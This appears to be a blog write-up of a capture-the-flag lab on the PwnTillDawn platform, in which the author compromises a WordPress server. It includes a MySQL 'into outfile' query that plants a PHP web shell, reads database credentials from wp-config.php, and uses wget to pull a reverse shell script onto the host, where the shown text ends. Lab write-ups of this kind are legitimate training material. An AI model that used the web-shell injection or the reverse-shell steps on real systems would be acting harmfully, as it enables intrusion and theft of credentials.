Hacking the Margheriti-Server — PwntillDawn CTF

4 min readJan 10, 2022

Hi guys, welcome to what will be the first of many CTF & bug bounty write-ups to come. This write-up essentially captures (pun intended) how I found 5 Flags on the Wizlynx Group’s Pwntilldawn online battlefield by exploiting a succession of weaknesses and vulnerabilities (In subsequent writeups I will include possible remediations of identified vulnerabilities). The methodology used in this attack may not necessarily be helpful in different attack scenarios.

The target website (E-CORP) with IP 10.150.150.145 as seen below is a WordPress website.

Recon&Scanning

I began the attack by doing some active reconnaissance on the web application using the Nmap command “ nmap -p 1–65535 -T4 -A -v 10.150.150.145”, which scans through all 65535 ports providing info on open ports and services running on them.

The result provided me with some interesting information. For the sake of this write-up, we will focus on port 3306 which is the default port for MySQL.

Next, I performed a directory bruteforce attack, using dirsearch to see if I could find any exposed sensitive files & folders(Oh and by the way, the importance of updating your wordlist cannot be overemphasized ) and as luck would have it, I did — always disable directory listing on WordPress. :-)

Downloading the “backup.zip” file and visiting the directory /wp-content/uploads/, I found my first and second flags— that was easy :)

This attack may seem trivial/ ‘CTFish’ but I have found exported/dumped databases with credentials in pentesting exercises I led in the past.

Login Bypass

Based on the recon done earlier, I tried out some SQLi attacks using the login parameters — had no luck there. So I decided to go back to the content of “backup.zip” file (see Figure 6) I downloaded and have a second look at it.

Now WordPress themes usually have a lot of files, which obviously contain several lines of code and so it’s important to know the function of each file before attempting to review them for critical information — this will save you a lot of time. Having my focus on exploiting the MySQL service, I went straight for the wp-config.php file, which tells WordPress how to connect to databases and BINGO! got the databases credentials (see Figure 7).

Using a personal favourite, DBeaver, I was able to establish a connection with the remote database. This made me capable of viewing and editing its content. And O! in addition to that, I found the third flag — a table name (see Figure 8)

Gaining Shell Access/RCE

Now ultimately, the goal is to gain shell access/run commands on the remote server. So leveraging the DB access I run the following script: SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “/var/www/html/cmd.php” which injected the file “cmd.php” into the html folder.

Now time to test it. Using the “ls” Linux command, I was able to view a list of the files & folders in the “html” folder (see figure 9).

Excluding the backup.zip file which I had already downloaded, the WordPress-Account.txt file was the only file that seemed interesting/out of place so I run “cat WordPress-Account.txt” and your guess is as good as mine…..got the username and password :-D.

I logged in using the credentials and got the fourth Flag on the dashboard :)

I suspected that the last flag would be out of the “html” folder and somewhere on the server. The RCE established earlier using the cmd.php file could not help me traverse out of the “html” folder. So I went on to host a web server using SimpleHTTPServer and downloaded the reverse shell script from my machine, into the victim's server, using the “wget” command (see Figure 12)